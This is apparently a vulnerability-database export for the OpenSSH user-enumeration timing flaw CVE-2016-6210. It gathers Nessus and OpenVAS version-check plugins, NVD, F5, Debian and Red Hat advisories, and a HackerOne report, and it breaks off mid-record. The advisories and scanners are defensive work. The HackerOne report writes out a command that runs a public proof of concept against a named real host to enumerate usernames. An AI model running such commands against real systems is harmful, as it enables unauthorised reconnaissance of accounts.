{"id": "F5_BIGIP_SOL14845276.NASL", "bulletinFamily": "scanner", "title": "F5 Networks BIG-IP : OpenSSH vulnerability (K14845276)", "description": "When SSHD tries to authenticate a non-existing user, it will pick up a\nfake password structure hard-coded in the SSHD source code. An\nattacker can measure timing information to determine if a user exists\nwhen verifying a password. (CVE-2016-6210)", "published": "2016-12-27T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/96106", "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.f5.com/csp/article/K14845276"], "cvelist": ["CVE-2016-6210"], "type": "nessus", "lastseen": "2021-01-01T01:57:57", "edition": 31, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-6210"]}, {"type": "f5", "idList": ["F5:K14845276"]}, {"type": "redhat", "idList": ["RHSA-2017:2563", "RHSA-2017:2029"]}, {"type": "debian", "idList": ["DEBIAN:DLA-578-1:0E24B", "DEBIAN:DSA-3626-1:F9FBB"]}, {"type": "hackerone", "idList": ["H1:476439"]}, {"type": "archlinux", "idList": ["ASA-201608-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808936", "OPENVAS:1361412562310140073", "OPENVAS:1361412562310809154", "OPENVAS:1361412562310703626", "OPENVAS:1361412562310809121", "OPENVAS:1361412562310811729", "OPENVAS:1361412562310882763", "OPENVAS:1361412562311220171190", "OPENVAS:703626", "OPENVAS:1361412562311220171189"]}, {"type": "nessus", "idList": ["EULEROS_SA-2017-1189.NASL", "DEBIAN_DLA-578.NASL", "ORACLEVM_OVMSA-2017-0150.NASL", "DEBIAN_DSA-3626.NASL", "CENTOS_RHSA-2017-2563.NASL", "ORACLELINUX_ELSA-2017-2563.NASL", "FREEBSD_PKG_ADCCEFD1708011E6A2CBC80AA9043978.NASL", "EULEROS_SA-2017-1190.NASL", "FEDORA_2016-7440FA5CE2.NASL", "REDHAT-RHSA-2017-2563.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137942", "PACKETSTORM:138006"]}, {"type": "zdt", "idList": ["1337DAY-ID-25438", "1337DAY-ID-25440"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF", "EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF"]}, {"type": "exploitdb", "idList": ["EDB-ID:40113", "EDB-ID:40136"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2563", "ELSA-2017-2029"]}, {"type": "fedora", "idList": ["FEDORA:95DA6605E7DF"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0036"]}, {"type": "centos", "idList": ["CESA-2017:2563", "CESA-2017:2029"]}, {"type": "freebsd", "idList": ["ADCCEFD1-7080-11E6-A2CB-C80AA9043978"]}, {"type": "slackware", "idList": ["SSA-2016-219-03"]}, {"type": "ubuntu", "idList": ["USN-3061-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:3C7597DAEB0A160E9DA1752927007C7C"]}, {"type": "symantec", "idList": ["SMNTC-1390"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY9.ASC"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS"]}, {"type": "amazon", "idList": ["ALAS-2017-898"]}, {"type": "gentoo", "idList": ["GLSA-201612-18"]}], "modified": "2021-01-01T01:57:57", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-01-01T01:57:57", "rev": 2}, "vulnersScore": 5.4}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K14845276.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96106);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-6210\");\n\n script_name(english:\"F5 Networks BIG-IP : OpenSSH vulnerability (K14845276)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When SSHD tries to authenticate a non-existing user, it will pick up a\nfake password structure hard-coded in the SSHD source code. An\nattacker can measure timing information to determine if a user exists\nwhen verifying a password. (CVE-2016-6210)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K14845276\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K14845276.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K14845276\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.2.1\",\"10.2.1-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.4.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.2.1\",\"10.2.1-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "naslFamily": "F5 Networks Local Security Checks", "pluginID": "96106", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_access_policy_manager"], "scheme": null, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}}

{"cve": [{"lastseen": "2020-12-09T20:07:40", "description": "sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-13T17:59:00", "title": "CVE-2016-6210", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6210"], "modified": "2019-02-07T11:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.2"], "id": "CVE-2016-6210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6210", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.2:p2:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-11-14T21:21:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-6210"], "description": "\nF5 Product Development has assigned ID 605497 (BIG-IP), ID 606040 (BIG-IQ and F5 iWorkflow), and ID 431179 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H14845276 on the **Diagnostics** &gt; **Identified** &gt; **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP AAM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | Medium | OpenSSH \nBIG-IP AFM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | Medium | OpenSSH \nBIG-IP Analytics | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.2.1 | Medium | OpenSSH \nBIG-IP APM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n\u200b\u200b11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP ASM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n\u200b\u200b\u200b\u200b\u200b\u200b11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP DNS | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3\u200b\u200b\u200b | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | 11.4.0 - 11.6.3 \n | 11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP Link Controller | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n\u200b\u200b\u200b\u200b\u200b\u200b11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP PEM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3\u200b | Medium | OpenSSH \nBIG-IP PSM | 11.4.0 - 11.4.1 | 11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP WebAccelerator | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WebSafe | 11.6.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3\u200b\u200b\u200b\u200b | Medium | OpenSSH \nARX | 6.2.0 - 6.4.0 | None | Low | OpenSSH \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | OpenSSH \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | OpenSSH \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | OpenSSH \nBIG-IQ ADC | 4.5.0 | None | Medium | OpenSSH \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | Medium | OpenSSH \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | OpenSSH \nF5 iWorkflow | 2.0.0 - 2.2.0 | 2.3.0 | Medium | OpenSSH \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability for BIG-IP systems, you can limit the allowable IP address ranges for secure shell (SSH) access. To do so, refer to [K5380: Specifying allowable IP ranges for SSH access](<https://support.f5.com/csp/article/K5380>).\n\n**Impact of action:** Before performing this action, ensure that the IP address used to access the BIG-IP system from SSH is included in the allowable IP address range. If the IP address is not included in the allowable IP address range, you will lose access to the BIG-IP system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2018-04-17T17:50:00", "published": "2016-12-23T03:42:00", "id": "F5:K14845276", "href": "https://support.f5.com/csp/article/K14845276", "title": "OpenSSH vulnerability CVE-2016-6210", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:00:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "Package : openssh\nVersion : 6.0p1-4+deb7u5\nCVE ID : CVE-2016-6210\n\nOpenSSH secure shell client and server had a user enumeration\nproblem reported.\n\nCVE-2016-6210\n\n User enumeration via covert timing channel\n\n\nFor Debian 7 &quot;Wheezy&quot;, this problem has been fixed in version\n6.0p1-4+deb7u5.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n- -- \n --------------------- Ola Lundqvist ---------------------------\n/ opal@debian.org Folkebogatan 26 \\\n| ola@inguza.com 654 68 KARLSTAD |\n| http://inguza.com/ +46 (0)70-332 1551 |\n\\ gpg/f.p.: 22F2 32C6 B1E0 F4BF 2B26 0A6A 5E90 DCFA 9426 876F /\n ---------------------------------------------------------------\n", "edition": 9, "modified": "2016-07-30T21:41:01", "published": "2016-07-30T21:41:01", "id": "DEBIAN:DLA-578-1:0E24B", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201607/msg00039.html", "title": "[SECURITY] [DLA 578-1] openssh security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-12T01:03:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3626-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 24, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssh\nCVE ID : CVE-2016-6210\nDebian Bug : 831902\n\nEddie Harari reported that the OpenSSH SSH daemon allows user\nenumeration through timing differences when trying to authenticate\nusers. When sshd tries to authenticate a non-existing user, it will pick\nup a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:6.7p1-5+deb8u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:7.2p2-6.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2016-07-24T09:19:36", "published": "2016-07-24T09:19:36", "id": "DEBIAN:DSA-3626-1:F9FBB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00204.html", "title": "[SECURITY] [DSA 3626-1] openssh security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)", "modified": "2018-06-07T18:23:03", "published": "2017-08-31T17:09:34", "id": "RHSA-2017:2563", "href": "https://access.redhat.com/errata/RHSA-2017:2563", "type": "redhat", "title": "(RHSA-2017:2563) Moderate: openssh security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-11T13:33:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10708", "CVE-2016-6210", "CVE-2016-6515"], "description": "OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:33:13", "published": "2017-08-01T09:57:17", "id": "RHSA-2017:2029", "href": "https://access.redhat.com/errata/RHSA-2017:2029", "type": "redhat", "title": "(RHSA-2017:2029) Moderate: openssh security, bug fix, and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "hackerone": [{"lastseen": "2020-03-06T19:23:38", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2016-6210"], "description": "**summary:**\nA vulnerability classified as problematic has been found in OpenSSH 7.2p2. check (INFO.png)Affected is an unknown function of the component Authentication. The manipulation of the argument Password with an unknown input leads to a information disclosure vulnerability (Username). CWE is classifying the issue as CWE-200. This is going to have an impact on confidentiality.\nThe weakness was disclosed 07/14/2016 by Eddie Harari as opensshd - user enumeration as confirmed mailinglist post (Full-Disclosure). The advisory is available at seclists.org. The vendor was not involved in the coordination of the public release. This vulnerability is traded as CVE-2016-6210 since 07/13/2016. It is possible to launch the attack remotely. The exploitation doesn't require any form of authentication. Technical details and a public exploit are known.\n\n**POC**\ndownload POC.py and write the next command. (you can try with any word-list or just use some random names like I did)\n- LINK: https://www.exploit-db.com/exploits/40136\n- CODE: python\nCommand:\npython POC.py newsletter.nextcloud.com -U usernames.txt\n\nOUTPUT:\ncheck (POC.png)\n\nin this case user whose time < 0.04717744470807732 is non existing user\nI tried with a small usernames list for POC, attacker will use a big list like rockyou.txt that on Kali Linux by default.\n\n## Impact\n\nAllows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.", "modified": "2020-03-01T11:00:36", "published": "2019-01-08T09:59:42", "id": "H1:476439", "href": "https://hackerone.com/reports/476439", "type": "hackerone", "title": "Nextcloud: Password authentication at newsletter.nextcloud.com discloses username list", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:35:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310808936", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808936", "type": "openvas", "title": "Fedora Update for openssh FEDORA-2016-7440fa5ce2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssh FEDORA-2016-7440fa5ce2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808936\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:54:54 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openssh FEDORA-2016-7440fa5ce2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openssh on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-7440fa5ce2\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/63LLZJD4MOKC26TFJIDXRWFT33ICG6PR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.2p2~10.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": 